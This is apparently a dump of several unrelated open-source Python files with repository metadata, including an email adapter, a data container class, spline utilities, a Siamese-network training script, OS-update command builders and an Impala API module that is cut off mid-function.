'transform_dataflow_machine_type':
transform_dataflow_machine_type,
'transform_dataflow_max_num_workers':
transform_dataflow_max_num_workers,
'transform_dataflow_disk_size_gb':
transform_dataflow_disk_size_gb,
'training_machine_spec':
training_machine_spec,
'training_replica_count':
training_replica_count,
'dataflow_subnetwork':
dataflow_subnetwork,
'dataflow_use_public_ips':
dataflow_use_public_ips,
'encryption_spec_key_name':
encryption_spec_key_name,
}
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(), 'tabnet_trainer_pipeline.json')
return pipeline_definition_path, parameter_values
| 44.046404
| 149
| 0.74317
|
fd390eec24009528885bb2eab5726f94759bf1b2
| 1,467
|
py
|
Python
|
app/core/adapters/mailjet.py
|
umluizlima/email-sender
|
d952874918fc6edc896dabe6d1c1e1391f9d8697
|
[
"MIT"
] | 7
|
2020-05-24T16:49:05.000Z
|
2021-05-03T18:50:00.000Z
|
app/core/adapters/mailjet.py
|
umluizlima/email-sender
|
d952874918fc6edc896dabe6d1c1e1391f9d8697
|
[
"MIT"
] | 1
|
2021-11-07T18:52:54.000Z
|
2021-11-07T18:52:55.000Z
|
app/core/adapters/mailjet.py
|
umluizlima/email-sender
|
d952874918fc6edc896dabe6d1c1e1391f9d8697
|
[
"MIT"
] | 2
|
2020-05-24T16:49:07.000Z
|
2022-02-03T00:57:25.000Z
|
from typing import Dict
from mailjet_rest import Client
from ..schemas import EmailSchema
from .base import BaseAdapter
class MailjetAdapter(BaseAdapter):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.client = Client(
auth=(
self.settings.MAILJET_API_KEY.get_secret_value(),
self.settings.MAILJET_API_SECRET.get_secret_value(),
),
version="v3.1",
)
def send(self, message: EmailSchema):
try:
self.client.send.create(data=self._prepare_message(message))
except Exception as error:
raise Exception(f"Error sending {message}", error)
def _prepare_message(self, message: EmailSchema) -> Dict:
return {
"Messages": [
{
"From": {
"Email": message.from_email
or self.settings.DEFAULT_EMAIL_ADDRESS
},
"To": [{"Email": message.to_email}],
"Subject": message.subject,
MailjetAdapter._get_content_attribute(
message.content_type
): message.content,
}
]
}
@staticmethod
def _get_content_attribute(content_type: str) -> str:
if content_type == "text/plain":
return "TextPart"
else:
return "HTMLPart"
| 29.938776
| 72
| 0.528971
|
3d90d7c98e3fb50149c77eb002567f870cf11977
| 122
|
py
|
Python
|
src/interpret.py
|
BotScutters/eye-of-the-needle
|
586d9c1e33763919b70382e67e4c7873bdbb05a8
|
[
"MIT"
] | 16
|
2019-04-08T22:09:51.000Z
|
2021-08-02T18:18:41.000Z
|
src/interpret.py
|
BotScutters/eye-of-the-needle
|
586d9c1e33763919b70382e67e4c7873bdbb05a8
|
[
"MIT"
] | 1
|
2019-11-19T06:27:37.000Z
|
2019-12-26T20:56:03.000Z
|
src/interpret.py
|
BotScutters/eye-of-the-needle
|
586d9c1e33763919b70382e67e4c7873bdbb05a8
|
[
"MIT"
] | 8
|
2019-04-08T23:01:39.000Z
|
2021-08-02T18:18:43.000Z
|
def run():
print("iNterpret: calculating performance metrics...")
print("iNterpret: generating final reports...")
| 30.5
| 58
| 0.696721
|
4d839981f24284a1b73710787dcc985d29b11e4f
| 538
|
py
|
Python
|
tests/rules/test_base64.py
|
Varun-22/Validator
|
2c5caa9323aef35e2796813a357e5a7d6d4a80ba
|
[
"MIT"
] | 41
|
2020-05-07T15:35:12.000Z
|
2021-11-01T03:57:09.000Z
|
tests/rules/test_base64.py
|
Varun-22/Validator
|
2c5caa9323aef35e2796813a357e5a7d6d4a80ba
|
[
"MIT"
] | 83
|
2020-05-09T22:11:26.000Z
|
2022-03-10T19:06:46.000Z
|
tests/rules/test_base64.py
|
Varun-22/Validator
|
2c5caa9323aef35e2796813a357e5a7d6d4a80ba
|
[
"MIT"
] | 25
|
2020-05-27T22:46:01.000Z
|
2022-03-04T01:36:11.000Z
|
from validator.rules import Base64
def test_base64_01():
assert Base64().check("c2hPd1MgaSBMSWtFOg==")
assert Base64().check("U09VVEggUEFSSw==")
assert Base64().check("QkxBQ0sgTUlSUk9S")
assert Base64().check("RkFSR08=")
assert Base64().check("QnJlYUtJTkcgQmFkIA==")
def test_base64_02():
assert not Base64().check("hbsdf")
assert not Base64().check("!@#")
assert not Base64().check("bfjhsdf HGHG &^&&")
assert not Base64().check("29i03r09j....")
assert not Base64().check("olgak9999")
| 20.692308
| 50
| 0.66171
|
cedb0d32a51a1f575a622b38de2cee3ab4757821
| 2,365
|
py
|
Python
|
mmcv/parallel/data_container.py
|
BIGWangYuDong/mmcv
|
c46deb0576edaff5cd5a7d384c617478c7a73a70
|
[
"Apache-2.0"
] | 3,748
|
2018-10-12T08:39:46.000Z
|
2022-03-31T17:22:55.000Z
|
mmcv/parallel/data_container.py
|
BIGWangYuDong/mmcv
|
c46deb0576edaff5cd5a7d384c617478c7a73a70
|
[
"Apache-2.0"
] | 1,637
|
2018-10-12T06:06:18.000Z
|
2022-03-31T02:20:53.000Z
|
mmcv/parallel/data_container.py
|
BIGWangYuDong/mmcv
|
c46deb0576edaff5cd5a7d384c617478c7a73a70
|
[
"Apache-2.0"
] | 1,234
|
2018-10-12T09:28:20.000Z
|
2022-03-31T15:56:24.000Z
|
# Copyright (c) OpenMMLab. All rights reserved.
import functools
import torch
def assert_tensor_type(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if not isinstance(args[0].data, torch.Tensor):
raise AttributeError(
f'{args[0].__class__.__name__} has no attribute '
f'{func.__name__} for type {args[0].datatype}')
return func(*args, **kwargs)
return wrapper
class DataContainer:
"""A container for any type of objects.
Typically tensors will be stacked in the collate function and sliced along
some dimension in the scatter function. This behavior has some limitations.
1. All tensors have to be the same size.
2. Types are limited (numpy array or Tensor).
We design `DataContainer` and `MMDataParallel` to overcome these
limitations. The behavior can be either of the following.
- copy to GPU, pad all tensors to the same size and stack them
- copy to GPU without stacking
- leave the objects as is and pass it to the model
- pad_dims specifies the number of last few dimensions to do padding
"""
def __init__(self,
data,
stack=False,
padding_value=0,
cpu_only=False,
pad_dims=2):
self._data = data
self._cpu_only = cpu_only
self._stack = stack
self._padding_value = padding_value
assert pad_dims in [None, 1, 2, 3]
self._pad_dims = pad_dims
def __repr__(self):
return f'{self.__class__.__name__}({repr(self.data)})'
def __len__(self):
return len(self._data)
@property
def data(self):
return self._data
@property
def datatype(self):
if isinstance(self.data, torch.Tensor):
return self.data.type()
else:
return type(self.data)
@property
def cpu_only(self):
return self._cpu_only
@property
def stack(self):
return self._stack
@property
def padding_value(self):
return self._padding_value
@property
def pad_dims(self):
return self._pad_dims
@assert_tensor_type
def size(self, *args, **kwargs):
return self.data.size(*args, **kwargs)
@assert_tensor_type
def dim(self):
return self.data.dim()
| 26.277778
| 79
| 0.62241
|
6433ca0e0c1c0316452cceedb5f77df0e71c419c
| 3,108
|
py
|
Python
|
rsbook_code/planning/paths.py
|
patricknaughton01/RoboticSystemsBook
|
0fc67cbccee0832b5f9b00d848c55697fa69bedf
|
[
"Apache-2.0"
] | 116
|
2018-08-27T15:32:59.000Z
|
2022-02-28T10:41:37.000Z
|
rsbook_code/planning/paths.py
|
patricknaughton01/RoboticSystemsBook
|
0fc67cbccee0832b5f9b00d848c55697fa69bedf
|
[
"Apache-2.0"
] | 2
|
2021-05-04T12:56:40.000Z
|
2022-02-18T23:13:33.000Z
|
rsbook_code/planning/paths.py
|
patricknaughton01/RoboticSystemsBook
|
0fc67cbccee0832b5f9b00d848c55697fa69bedf
|
[
"Apache-2.0"
] | 29
|
2019-06-20T20:13:36.000Z
|
2022-02-20T14:01:34.000Z
|
import numpy as np
import math
def linear(m0,m1,u,domain=None):
"""For completeness: linear interpolation between m0 and m1 at parameter u in [0,1].
Alternatively, if `domain` != None, then this will use domain=(a,b)
"""
if domain is not None:
return linear(m0,m1,(u-domain[0])/(domain[1]-domain[0]))
return (1.0-u)*m0 + u*m1
def piecewise_linear(ms,u,times=None):
"""Evaluate a piecewise linear spline at interpolation parameter u in [0,1]
Milestones are given by the array `ms`. `ms` is assumed to be a list of
n Numpy arrays, or an n x d Numpy array.
If `times` != None, this will be a list of n non-decreasing time indices.
"""
if times is not None:
raise NotImplementedError("Not done with timed paths")
n = len(ms)
s = u*n
i = int(math.floor(s))
u = s - i
if i < 0: return ms[0]
elif i+1 >= n: return ms[-1]
return linear(ms[i],ms[i+1],u)
def hermite(m0,m1,t0,t1,u,domain=None):
"""Evaluate a cubic hermite curve at interpolation parameter u in [0,1].
Endpoints are m0 and m1, with derivatives t0 and t1. These are assumed to be Numpy arrays.
Alternatively, if `domain` != None, then this will use domain=(a,b)
as the interpolation domain
"""
if domain is not None:
assert isinstance(domain,(list,tuple)) and len(domain) == 2,"Need to provide a pair as a domain"
scale = (domain[1]-domain[0])
t = (u - domain[0])/scale
return hermite(m0,m1,t0*scale,t1*scale,t)
u2 = u**2
u3 = u**3
cm0 = 2*u3 - 3*u2 + 1
cm1 = -2*u3 + 3*u2
ct0 = u3 - 2*u2 + u
ct1 = u3 - u2
return cm0*m0 + cm1*m1 + ct0*t0 + ct1*t1
def hermite_deriv(m0,m1,t0,t1,u,domain=None):
"""Evaluate the derivative of a cubic hermite curve at interpolation parameter u in [0,1].
Endpoints are m0 and m1, with derivatives t0 and t1. These are assumed to be numpy arrays.
Alternatively, if `domain` != None, then this will use domain=(a,b)
as the interpolation domain
"""
if domain is not None:
assert isinstance(domain,(list,tuple)) and len(domain) == 2,"Need to provide a pair as a domain"
scale = (domain[1]-domain[0])
t = (u - domain[0])/scale
return hermite_deriv(m0,m1,t0*scale,t1*scale,t)
u2 = u**2
cm0 = 6*u2 - 6*u
cm1 = -6*u2 + 6*u
ct0 = 3*u2 - 4*u + 1
ct1 = 3*u2 - 2*u
return cm0*m0 + cm1*m1 + ct0*t0 + ct1*t1
def hermite_spline(ms,ts,u,times=None):
"""Evaluate a cubic hermite spline at interpolation parameter u in [0,1].
Milestones are given in `ms`, with derivatives in `ts`. These are assumed to be
lists of n Numpy arrays, or n x d Numpy arrays.
If `times` != None, this will be a list of n non-decreasing time indices.
"""
if times is not None:
raise NotImplementedError("Not done with timed paths")
n = len(ms)
s = u*n
i = int(math.floor(s))
u = s - i
if i < 0: return ms[0]
elif i+1 >= n: return ms[-1]
return hermite(ms[i],ms[i+1],ts[i],ts[i+1],u)
| 32.715789
| 104
| 0.607465
|
d2be0693ac3b63c0e837b131c3715a876de2a61b
| 3,325
|
py
|
Python
|
train.py
|
jalywang123/facial-reidentification
|
7bf9293eb50b6081e598aeff1516523057bbe002
|
[
"MIT"
] | null | null | null |
train.py
|
jalywang123/facial-reidentification
|
7bf9293eb50b6081e598aeff1516523057bbe002
|
[
"MIT"
] | null | null | null |
train.py
|
jalywang123/facial-reidentification
|
7bf9293eb50b6081e598aeff1516523057bbe002
|
[
"MIT"
] | 1
|
2021-01-06T00:02:26.000Z
|
2021-01-06T00:02:26.000Z
|
import sys
import argparse
import time
import torch
import PIL.ImageOps
from tqdm import tqdm
import torch.nn as nn
from torch import optim
import torchvision.utils
from helpers import show_plot
from datetime import datetime
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset
import torchvision.datasets as dset
import torchvision.datasets.fakedata
import torchvision.transforms as transforms
from loss import ContrastiveLoss
from siamesenetwork import SiameseNetwork
from siamesenetwork import SiameseNetwork_V2
from siamesenetwork import SiameseNetworkDataset
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(f"training device: {device}")
args = argparse.ArgumentParser()
args.add_argument("--epoch")
args.add_argument("--lr")
res = args.parse_args()
class Config:
training_dir = "./lfw_funneled"
train_batch_size = 64
train_number_epochs = int(res.epoch) or 500
folder_dataset = dset.ImageFolder(root=Config.training_dir)
siamese_dataset = SiameseNetworkDataset(
imageFolderDataset=folder_dataset,
transform=transforms.Compose(
[
transforms.Resize((100, 100)),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
]
),
should_invert=False,
)
train_dataloader = DataLoader(
siamese_dataset,
shuffle=True,
# num_workers=8,
batch_size=Config.train_batch_size,
)
net = SiameseNetwork().to(device)
criterion = ContrastiveLoss().to(device)
optimizer = optim.Adam(net.parameters(), lr=float(res.lr) or 0.0003)
counter = []
loss_history = []
iteration_number = 0
try:
import slack_callback
except Exception as e:
pass
for epoch in range(1, Config.train_number_epochs + 1):
start = time.time()
for i, data in enumerate(train_dataloader, 0):
img0, img1, label = data
img0, img1, label = img0.to(device), img1.to(device), label.to(device)
optimizer.zero_grad()
output1, output2 = net(img0, img1)
loss_contrastive = criterion(output1, output2, label)
loss_contrastive.backward()
optimizer.step()
# if i % 10 == 0:
# print(
# "epoch: {} current loss: {} time taken: {}s".format(
# epoch, loss_contrastive.item(), str(time.time() - start)[:5]
# )
# )
message = "epoch: {} current loss: {:.4f} time taken: {}s".format(
epoch, loss_contrastive.item(), str(time.time() - start)[:5]
)
try:
slack_callback.write(message)
except Exception as e:
pass
print(
"epoch: {} current loss: {:.4f} time taken: {}s".format(
epoch, loss_contrastive.item(), str(time.time() - start)[:5]
)
)
# iteration_number += 10
counter.append(epoch)
loss_history.append(loss_contrastive.item())
if epoch % 50 == 0 and epoch > 0:
state_dict = {
"epoch": epoch + 1,
"state_dict": net.state_dict(),
"optim_dict": optimizer.state_dict(),
"loss_history": loss_history,
"counter": counter,
}
torch.save(state_dict, f"models/model_state_dict_{epoch}.pt")
print()
print(f"model checkpoint saved to models/model_state_dict_{epoch}")
show_plot(counter, loss_history, save=True)
| 28.418803
| 78
| 0.664662
|
e515a3360cfdc2a55c57866968737de94ac33caa
| 631
|
py
|
Python
|
main_gen.py
|
rongcloud/rongcloud-message-generator
|
3ac5cfca0488e17ba1d3eaf1b547b248cfc296c9
|
[
"MIT"
] | null | null | null |
main_gen.py
|
rongcloud/rongcloud-message-generator
|
3ac5cfca0488e17ba1d3eaf1b547b248cfc296c9
|
[
"MIT"
] | null | null | null |
main_gen.py
|
rongcloud/rongcloud-message-generator
|
3ac5cfca0488e17ba1d3eaf1b547b248cfc296c9
|
[
"MIT"
] | null | null | null |
#coding=utf-8
from MsgObj import MsgObj;
import Util
def main():
# 1.构造 MsgObj 对象
obj = MsgObj("CustomMessage","app:cusMsg")
# 2.设置消息持久化标识
obj.setPersistentFlag(Util.Persistent.IsCounted)
# 3.设置消息所在包名 安卓专用
obj.setPackage("cn.rongcloud.im.im.message")
# 4.设置参数列表
obj.addParamBool("isVip")
obj.addParamString("name")
obj.addParamString("uid")
obj.addParamInt("age")
obj.addParamDouble("price")
obj.addParamMap("dataMap")
obj.addParamList("dataList")
# 5.打印消息内容
obj.showDetail()
# 6.生成消息
obj.genMsg()
pass
if __name__ == '__main__':
main()
| 19.71875
| 52
| 0.638669
|
38776d6d686bf44e8f4753f15c9dcfc3599d9d85
| 10,399
|
py
|
Python
|
inbm/dispatcher-agent/dispatcher/sota/os_updater.py
|
ahameedx/intel-inb-manageability
|
aca445fa4cef0b608e6e88e74476547e10c06073
|
[
"Apache-2.0"
] | null | null | null |
inbm/dispatcher-agent/dispatcher/sota/os_updater.py
|
ahameedx/intel-inb-manageability
|
aca445fa4cef0b608e6e88e74476547e10c06073
|
[
"Apache-2.0"
] | null | null | null |
inbm/dispatcher-agent/dispatcher/sota/os_updater.py
|
ahameedx/intel-inb-manageability
|
aca445fa4cef0b608e6e88e74476547e10c06073
|
[
"Apache-2.0"
] | null | null | null |
"""
SOTA updates factory class. Used to trigger
package installation, updates, security updates etc
Copyright (C) 2017-2022 Intel Corporation
SPDX-License-Identifier: Apache-2.0
"""
import logging
import re
import os
from pathlib import Path
from typing import List, Optional
from abc import ABC, abstractmethod
from inbm_common_lib.utility import CanonicalUri
from inbm_common_lib.shell_runner import PseudoShellRunner
from inbm_lib.constants import DOCKER_CHROOT_PREFIX, CHROOT_PREFIX
from .command_list import CommandList
from .constants import MENDER_ARTIFACT_INSTALL_COMMAND
from .constants import MENDER_UPDATE_SCRIPT_EHL
from .constants import MENDER_COMMAND
from .constants import MENDER_MINIMIZE_LOGS_ARGUMENT
from .constants import MENDER_INSTALL_ARGUMENT
from .converter import size_to_bytes
from .sota_error import SotaError
from ..common import uri_utilities
from ..packagemanager import irepo
logger = logging.getLogger(__name__)
class OsUpdater(ABC):
"""Abstract class for handling OS update related tasks for the system."""
def __init__(self) -> None:
self.cmd_list: List = []
@abstractmethod
def update_remote_source(self, uri: Optional[CanonicalUri], repo: irepo.IRepo) -> List[str]:
"""Abstract class method to create command list to update from a remote source.
@param uri: Original download URI, if given in manifest.
@param repo: Directory on disk where update has been downloaded, if given in manifest.
@return: Command list to execute to perform update.
"""
pass
@abstractmethod
def update_local_source(self, file_path: str) -> List[str]:
"""Abstract class method to create command list to update from a local source.
@param file_path: path to local file
@return: Command list to execute to perform update.
"""
pass
@staticmethod
def get_estimated_size() -> int:
"""Gets the size of the update
@return: 0 if size is freed. Returns in bytes of size consumed
"""
pass
@staticmethod
def _create_local_mender_cmd(file_path: str) -> List[str]:
commands = [" " + MENDER_COMMAND + " " + MENDER_INSTALL_ARGUMENT + " " +
file_path + " " + MENDER_MINIMIZE_LOGS_ARGUMENT]
return CommandList(commands).cmd_list
class DebianBasedUpdater(OsUpdater):
"""DebianBasedUpdater class, child of OsUpdater"""
def __init__(self) -> None:
super().__init__()
def update_remote_source(self, uri: Optional[CanonicalUri], repo: irepo.IRepo) -> List[str]:
"""Concrete class method to create command list to update from a remote source for Debian OS.
@param uri: Original download URI, if given in manifest.
@param repo: Directory on disk where update has been downloaded, if given in manifest.
@return: Command list to execute to perform update.
"""
logger.debug("")
os.environ["DEBIAN_FRONTEND"] = "noninteractive"
is_docker_app = os.environ.get("container", False)
if is_docker_app:
logger.debug("APP ENV : {}".format(is_docker_app))
# get all packages ready for install (requires network and does
# not require host PID/DOCKER_CHROOT_PREFIX), then run the install locally
# (does not require network but does require host PID/DOCKER_CHROOT_PREFIX)
cmds = [CHROOT_PREFIX + "/usr/bin/apt-get update", # needs network
CHROOT_PREFIX + "/usr/bin/dpkg-query -f '${binary:Package}\\n' -W",
CHROOT_PREFIX + "/usr/bin/apt-get -yq --download-only upgrade", # needs network
DOCKER_CHROOT_PREFIX + "/usr/bin/apt-get -yq upgrade"] # local
else:
cmds = ["apt-get update",
"dpkg-query -f '${binary:Package}\\n' -W", "apt-get -yq upgrade"]
return CommandList(cmds).cmd_list
def update_local_source(self, file_path: str) -> List[str]:
"""Concrete class method to create command list to update from a local source for Debian OS.
@param file_path: path to local file
@return: Command list to execute to perform update.
"""
logger.error('Local install of Debian packages is not supported.')
return CommandList([]).cmd_list
@staticmethod
def get_estimated_size() -> int:
"""Gets the size of the update
@return: Returns 0 if size is freed. Returns in bytes of size consumed
"""
logger.debug("")
is_docker_app = os.environ.get("container", False)
cmd = "/usr/bin/apt-get -u upgrade --assume-no"
if is_docker_app:
logger.debug("APP ENV : {}".format(is_docker_app))
(upgrade, _, _) = PseudoShellRunner.run(DOCKER_CHROOT_PREFIX + cmd)
else:
(upgrade, _, _) = PseudoShellRunner.run(cmd)
return DebianBasedUpdater._get_estimated_size_from_apt_get_upgrade(upgrade)
@staticmethod
def _get_estimated_size_from_apt_get_upgrade(upgrade_output: str) -> int:
logger.debug("")
output = "\n".join([k for k in upgrade_output.splitlines() if 'After this operation' in k])
update_regex = re.search(r"(\d+(,\d+)*(\.\d+)?.(kB|B|mB|gB)).*(freed|used)", output)
try:
if update_regex is None:
return 0
size_string = update_regex.group(1)
freed_or_used = update_regex.group(5)
update_size = size_to_bytes(size_string.replace(',', ''))
if freed_or_used == "used":
return update_size
else:
logger.info('Update will free some size on disk')
return 0
except AttributeError: # TODO(gblewis1): return/process an error--size could be > than 0
logger.info('Update size could not be extracted!')
return 0
class YoctoX86_64Updater(OsUpdater):
"""YoctoX86_64Updater class, child of OsUpdater"""
def __init__(self) -> None:
super().__init__()
def update_remote_source(self, uri: Optional[CanonicalUri], repo: irepo.IRepo) -> List[str]:
"""Concrete class method to create command list to update from a remote source for Yocto X86 OS.
@param uri: Original download URI, if given in manifest.
@param repo: Directory on disk where update has been downloaded, if given in manifest.
@return: Command list to execute to perform update.
"""
if uri is None:
raise SotaError("missing URI.")
filename = uri_utilities.uri_to_filename(uri.value)
commands = [" " + MENDER_COMMAND + " " + MENDER_INSTALL_ARGUMENT + " " +
str(Path(repo.get_repo_path()) / filename) + " "
+ MENDER_MINIMIZE_LOGS_ARGUMENT]
# Only some Yocto systems need to run an additional command after running mender.
if Path(str(MENDER_UPDATE_SCRIPT_EHL)).is_file():
commands.append(MENDER_ARTIFACT_INSTALL_COMMAND)
return CommandList(commands).cmd_list
def update_local_source(self, file_path: str) -> List[str]:
"""Concrete class method to create command list to update from a local source for Yocto X86 OS.
@param file_path: path to local file
@return: Command list to execute to perform update.
"""
return super()._create_local_mender_cmd(file_path)
@staticmethod
def get_estimated_size() -> int:
"""Gets the size of the update
@return: Returns 0 if size is freed. Returns in bytes of size consumed
"""
return 0
class YoctoARMUpdater(OsUpdater):
"""YoctoARMUpdater class, child of OsUpdater"""
def __init__(self) -> None:
super().__init__()
def update_remote_source(self, uri: Optional[CanonicalUri], repo: irepo.IRepo) -> List[str]:
"""Concrete class method to create command list to update from a remote source for Yocto ARM OS.
@param uri: Original download URI, if given in manifest.
@param repo: Directory on disk where update has been downloaded, if given in manifest.
@return: Command list to execute to perform update.
"""
if uri is None:
raise SotaError("missing URI.")
try:
filename = uri.value[uri.value.rfind("/") + 1:]
except IndexError:
raise SotaError('URI ' + str(uri) + ' is improperly formatted')
commands = [" " + MENDER_COMMAND + " " + MENDER_INSTALL_ARGUMENT + " " +
str(Path(repo.get_repo_path()) / filename) + " "
+ MENDER_MINIMIZE_LOGS_ARGUMENT]
return CommandList(commands).cmd_list
def update_local_source(self, file_path: str) -> List[str]:
"""Concrete class method to create command list to update from a remote source for Yocto ARM OS.
@param file_path: path to local file
@return: Command list to execute to perform update.
"""
return super()._create_local_mender_cmd(file_path)
@staticmethod
def get_estimated_size() -> int:
"""Gets the size of the update
@return: Returns 0 if size is freed. Returns in bytes of size consumed
"""
return 0
class WindowsUpdater(OsUpdater):
"""WindowsUpdater class, child of OsUpdater"""
def __init__(self) -> None:
super().__init__()
def update_remote_source(self, uri: Optional[CanonicalUri], repo: irepo.IRepo) -> List[str]:
"""Concrete class method to create command list to update from a remote source for Windows OS.
@param uri: Original download URI, if given in manifest.
@param repo: Directory on disk where update has been downloaded, if given in manifest.
@return: Command list to execute to perform update.
"""
pass
def update_local_source(self, file_path: str) -> List[str]:
"""Concrete class method to create command list to update from a remote source for Windows OS.
@param file_path: path to local file
@return: Command list to execute to perform update.
"""
pass
@staticmethod
def get_estimated_size() -> int:
"""Gets the size of the update. Stub.
@return: Returns 0 if size is freed. Returns in bytes of size consumed
"""
return 0
| 39.093985
| 104
| 0.650159
|
949efeb188218c5ae4eed5fe198adfcc18bb4606
| 3,045
|
py
|
Python
|
pyser/api/blog.py
|
pyserorg/backend
|
af6be4db7ed7961e80337c95de1e7cd8a06b778a
|
[
"BSD-2-Clause"
] | 1
|
2019-05-06T20:54:06.000Z
|
2019-05-06T20:54:06.000Z
|
pyser/api/blog.py
|
mekanix/pyser-backend
|
af6be4db7ed7961e80337c95de1e7cd8a06b778a
|
[
"BSD-2-Clause"
] | null | null | null |
pyser/api/blog.py
|
mekanix/pyser-backend
|
af6be4db7ed7961e80337c95de1e7cd8a06b778a
|
[
"BSD-2-Clause"
] | 2
|
2018-12-01T20:35:54.000Z
|
2018-12-26T18:13:18.000Z
|
from datetime import datetime
from freenit.api.methodviews import MethodView
from freenit.schemas.paging import PageInSchema, paginate
from flask_jwt_extended import get_jwt_identity, jwt_optional, jwt_required
from flask_smorest import Blueprint, abort
from freenit.models.sql.user import User
from ..models.blog import Blog
from ..schemas.blog import BlogPageOutSchema, BlogSchema
blueprint = Blueprint('blogs', 'blogs')
@blueprint.route('', endpoint='list')
class BlogListAPI(MethodView):
@jwt_optional
@blueprint.arguments(PageInSchema(), location='headers')
@blueprint.response(BlogPageOutSchema)
def get(self, pagination):
"""List blog posts"""
user_id = get_jwt_identity()
if user_id is None:
query = Blog.select().where(Blog.published)
else:
query = Blog.select()
return paginate(query, pagination)
@jwt_required
@blueprint.arguments(BlogSchema)
@blueprint.response(BlogSchema)
def post(self, args):
"""Create blog post"""
blog = Blog(**args)
blog.date = datetime.utcnow()
user_id = get_jwt_identity()
try:
user = User.get(id=user_id)
except User.DoesNotExist:
abort(404, message='User not found')
try:
Blog.find(
blog.date.year,
blog.date.month,
blog.date.day,
blog.slug,
)
abort(409, message='Post with the same title already exists')
except Blog.DoesNotExist:
blog.author = user
blog.save()
return blog
@blueprint.route('/<year>/<month>/<day>/<slug>', endpoint='detail')
class BlogAPI(MethodView):
@blueprint.response(BlogSchema)
def get(self, year, month, day, slug):
"""Get blog post details"""
try:
blog = Blog.find(year, month, day, slug)
except Blog.DoesNotExist:
abort(404, message='No such blog')
except ValueError:
abort(409, message='Multiple blogs found')
return blog
@jwt_required
@blueprint.arguments(BlogSchema(partial=True))
@blueprint.response(BlogSchema)
def patch(self, args, year, month, day, slug):
"""Edit blog post details"""
try:
blog = Blog.find(year, month, day, slug)
except Blog.DoesNotExist:
abort(404, message='No such blog')
except ValueError:
abort(409, message='Multiple blogs found')
for field in args:
setattr(blog, field, args[field])
blog.save()
return blog
@jwt_required
@blueprint.response(BlogSchema)
def delete(self, year, month, day, slug):
"""Delete blog post"""
try:
blog = Blog.find(year, month, day, slug)
except Blog.DoesNotExist:
abort(404, message='No such blog')
except ValueError:
abort(409, message='Multiple blogs found')
blog.delete_instance()
return blog
| 31.71875
| 75
| 0.610181
|
4dfc1d00f19201b3dd2153e2c67227e45094a49c
| 6,989
|
py
|
Python
|
apps/impala/src/impala/api.py
|
FrommyMind/hue
|
60a2df13da71bed656adbf61269ab841e2370ed4
|
[
"Apache-2.0"
] | 2
|
2020-02-02T15:22:13.000Z
|
2020-07-29T15:25:44.000Z
|
apps/impala/src/impala/api.py
|
FrommyMind/hue
|
60a2df13da71bed656adbf61269ab841e2370ed4
|
[
"Apache-2.0"
] | 7
|
2019-11-28T21:48:38.000Z
|
2020-08-02T18:06:40.000Z
|
apps/impala/src/impala/api.py
|
FrommyMind/hue
|
60a2df13da71bed656adbf61269ab841e2370ed4
|
[
"Apache-2.0"
] | 6
|
2020-05-29T21:46:30.000Z
|
2020-12-15T20:32:19.000Z
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
## Main views are inherited from Beeswax.
import base64
import logging
import json
import struct
from django.utils.translation import ugettext as _
from django.views.decorators.http import require_POST
from beeswax.api import error_handler
from beeswax.models import Session
from beeswax.server import dbms as beeswax_dbms
from beeswax.views import authorized_get_query_history
from desktop.lib.django_util import JsonResponse
from desktop.lib.thrift_util import unpack_guid
from desktop.models import Document2
from jobbrowser.apis.query_api import _get_api
from impala import dbms
from impala.server import get_api as get_impalad_api, _get_impala_server_url
from libanalyze import analyze as analyzer, rules
from notebook.models import make_notebook
LOG = logging.getLogger(__name__)
ANALYZER = rules.TopDownAnalysis() # We need to parse some files so save as global
@require_POST
@error_handler
def invalidate(request):
cluster = json.loads(request.POST.get('cluster', '{}'))
database = request.POST.get('database', None)
table = request.POST.get('table', None)
flush_all = request.POST.get('flush_all', 'false').lower() == 'true'
query_server = dbms.get_query_server_config(connector=None) # TODO: connector support
db = beeswax_dbms.get(request.user, query_server=query_server)
response = {'status': 0, 'message': ''}
db.invalidate(database=database, table=table, flush_all=flush_all)
response['message'] = _('Successfully invalidated metadata')
return JsonResponse(response)
@require_POST
@error_handler
def refresh_table(request, database, table):
query_server = dbms.get_query_server_config()
db = beeswax_dbms.get(request.user, query_server=query_server)
response = {'status': 0, 'message': ''}
db.refresh_table(database, table)
response['message'] = _('Successfully refreshed metadata for `%s`.`%s`') % (database, table)
return JsonResponse(response)
@require_POST
@error_handler
def get_exec_summary(request, query_history_id):
query_server = dbms.get_query_server_config()
db = beeswax_dbms.get(request.user, query_server=query_server)
response = {'status': -1}
query_history = authorized_get_query_history(request, query_history_id, must_exist=True)
if query_history is None:
response['message'] = _('get_exec_summary requires a valid query_history_id')
else:
session = Session.objects.get_session(request.user, query_server['server_name'])
operation_handle = query_history.get_handle().get_rpc_handle()
session_handle = session.get_handle()
summary = db.get_exec_summary(operation_handle, session_handle)
response['status'] = 0
response['summary'] = summary
return JsonResponse(response)
@require_POST
@error_handler
def get_runtime_profile(request, query_history_id):
query_server = dbms.get_query_server_config()
db = beeswax_dbms.get(request.user, query_server=query_server)
response = {'status': -1}
query_history = authorized_get_query_history(request, query_history_id, must_exist=True)
if query_history is None:
response['message'] = _('get_runtime_profile requires a valid query_history_id')
else:
session = Session.objects.get_session(request.user, query_server['server_name'])
operation_handle = query_history.get_handle().get_rpc_handle()
session_handle = session.get_handle()
profile = db.get_runtime_profile(operation_handle, session_handle)
response['status'] = 0
response['profile'] = profile
return JsonResponse(response)
@require_POST
@error_handler
def alanize(request):
response = {'status': -1}
cluster = json.loads(request.POST.get('cluster', '{}'))
query_id = json.loads(request.POST.get('query_id'))
api = _get_api(request.user, cluster=cluster)
if query_id:
LOG.debug("Attempting to get Impala query profile for query ID: %s" % (query_id))
doc = Document2.objects.get(id=query_id)
